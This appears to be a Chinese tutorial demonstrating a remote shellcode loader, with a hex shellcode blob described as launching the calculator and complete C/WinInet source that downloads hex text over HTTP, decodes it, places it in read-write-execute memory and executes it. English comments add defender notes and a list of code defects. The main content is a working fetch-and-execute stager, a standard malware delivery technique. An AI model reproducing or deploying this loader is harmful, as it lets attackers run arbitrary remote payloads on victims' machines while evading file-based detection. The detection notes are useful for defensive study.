远程http请求Shellcode加载,Shellcode放于服务器http服务上,可随意变更ShellCode
演示
Shellcode
放于服务器上的Shellcode必须是完整的一段16进制代码
利用搜索替换去掉 \x、0x、逗号、分号、引号等符号，使其成为一段完整的16进制代码
弹出计算器的Shellcode
E900000000558BEC83EC18B94C772607E8440000008D4DE8C745E87573657251C745EC33322E6466C745F06C6CC645F200FFD0B9318B6F87E81C0000006A058D4DF4C745F463616C6351C745F82E657865C645FC00FFD0C9C3558BEC83EC1C64A1300000005356578B400C894DEC8B780CE9A70000008B473033F68B5F2C8B3F8945F88B423C897DF48B4410788945F085C00F8485000000C1EB1033C985DB742D8B7DF80FBE140FC1CE0D803C0F618955F87C098BC283C0E003F0EB030375F8413BCB72DF8B55FC8B7DF48B45F08B4C101833DB8B44102003C2894DE885C9743C8B0833FF03CA83C004894DF88BD18945E48A0AC1CF0D0FBEC103F84284C975F18B55FC897DF88B45F88B7DF403C63B45EC741E8B45E4433B5DE872C48B57188955FC85D20F854BFFFFFF33C05F5E5BC9C38B75F08B4416248D04580FB70C108B44161C8D04888B041003C2EBDF
Demo
#include <stdio.h>
#include <Windows.h>
#include <WinInet.h>
#pragma comment(lib, "WinInet.lib")
// Fetches "http://<URL><SubPath>" over plaintext HTTP (port 80) through WinInet
// and returns the first chunk of the response body as a heap buffer.
//
// URL     - host name handed to InternetConnect (despite the parameter name it is
//           the host, not a full URL).
// SubPath - request path handed to HttpOpenRequest ("GET").
// Returns a buffer allocated with new[] that the caller owns, or NULL when
// InternetConnect fails. No other WinInet call in this function is checked.
//
// Defender notes: the session is opened with the fixed User-Agent string
// "www.nstns.com/0.1", so the request is a stable network indicator, and the
// caller (shellcode_Loding) treats the returned text as code to execute.
// Resource handling: none of the three WinInet handles is ever closed and the
// header buffer is never freed, so each call leaks them.
char* GetUrlPage(char* URL, char* SubPath)
{
// Only hRequest receives the initializer; hInternet/hConnect are assigned below.
HINTERNET hInternet, hConnect, hRequest = NULL;
DWORD dwOpenRequestFlags, dwRet = 0;
unsigned char* pResponseHeaderIInfo = NULL;
DWORD dwResponseHeaderIInfoSize = 2048;
BYTE* pBuf = NULL;
// 128 KiB: the body is read exactly once into this buffer, so a longer body is cut off.
DWORD dwBufSize = 64 * 2048;
// Fixed User-Agent; the returned session handle is not validated before use.
hInternet = ::InternetOpen("www.nstns.com/0.1", INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, 0);
hConnect = ::InternetConnect(hInternet, URL, INTERNET_DEFAULT_HTTP_PORT, 0, 0, INTERNET_SERVICE_HTTP, 0, 0);
// The only error check in the function; hInternet is leaked on this path.
if (NULL == hConnect)
return NULL;
// Bare GET: no auth, no cookies, no UI, cache bypassed, connection kept alive.
dwOpenRequestFlags = INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP | INTERNET_FLAG_KEEP_CONNECTION |
INTERNET_FLAG_NO_AUTH | INTERNET_FLAG_NO_COOKIES | INTERNET_FLAG_NO_UI | INTERNET_FLAG_RELOAD;
hRequest = HttpOpenRequest(hConnect, "GET", SubPath, NULL, NULL, NULL, dwOpenRequestFlags, 0);
// Return value ignored: a failed send still falls through to the reads below.
HttpSendRequest(hRequest, NULL, 0, NULL, 0);
// Raw response headers are queried into a zeroed 2 KiB buffer that is never
// read again or freed (leak).
pResponseHeaderIInfo = new unsigned char[dwResponseHeaderIInfoSize];
RtlZeroMemory(pResponseHeaderIInfo, dwResponseHeaderIInfoSize);
HttpQueryInfo(hRequest, HTTP_QUERY_RAW_HEADERS_CRLF, pResponseHeaderIInfo, &dwResponseHeaderIInfoSize, NULL);
// The body buffer is zero-filled so the caller can treat it as a C string; a
// body that fills all dwBufSize bytes would have no terminator.
pBuf = new BYTE[dwBufSize];
RtlZeroMemory(pBuf, dwBufSize);
// Single read; dwRet (bytes actually read) is discarded, so the caller cannot
// tell how much of pBuf holds real data.
InternetReadFile(hRequest, pBuf, dwBufSize, &dwRet);
return (char*)pBuf;
}
// Educational sample of an in-process loader: downloads a hex-encoded payload
// over plaintext HTTP, decodes it, copies it into an RWX region and jumps to it.
// The sequence below (WinInet GET -> VirtualAlloc PAGE_EXECUTE_READWRITE ->
// memcpy -> indirect call into that region) is the behaviour chain endpoint
// monitoring keys on.
//
// Returns 0 (false) after the payload returns, or NULL (also false) when
// VirtualAlloc fails; the return value therefore carries no information.
// Defects visible here: the NULL return of GetUrlPage is not checked before
// strlen, sscanf failures are not checked (non-hex input decodes to 0x00 bytes
// left by calloc), strlen's size_t is narrowed into an int, and neither `value`
// nor the buffer returned by GetUrlPage is ever freed.
bool shellcode_Loding() {
// Hard-coded loopback host and path; the text served there is used as code.
const char* ShellCode = GetUrlPage("127.0.0.1", "/shellcode.txt");
// HTTP request for the ShellCode text
printf("%s\n",ShellCode);
// Length of the hex text; every two characters become one byte, so an odd
// trailing character is dropped by the /2 below.
int shellcode_length = strlen(ShellCode);
// Hex decode: "%2hhx" reads two hex digits into value[count], then the text
// pointer advances by two characters.
unsigned char* value = (unsigned char*)calloc(shellcode_length / 2, sizeof(unsigned char));for (size_t count = 0; count < shellcode_length / 2; count++) {sscanf(ShellCode, "%2hhx", &value[count]);ShellCode += 2;}
// Process the ShellCode
// Private writable+executable allocation sized to the decoded payload: the
// single most visible artifact of this technique for memory scanners.
LPVOID Memory = VirtualAlloc(NULL,shellcode_length / 2, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
// Allocate a block of memory, set readable and executable
// NULL converts to false for the bool return; `value` leaks on this path.
if (Memory == NULL) { return NULL; }
memcpy(Memory, value,shellcode_length / 2);
// Copy the ShellCode to the memory location
// Control transfer into the downloaded bytes on the current thread; execution
// only comes back here if the payload returns.
((void(*)())Memory)();
return 0;
}
// Entry point: runs the loader once, then blocks on "pause" before exiting.
// argc/argv are unused.
int main(int argc, char* argv[])
{
shellcode_Loding();
// system() hands "pause" to the command interpreter; its result is ignored.
system("pause");
return 0;
}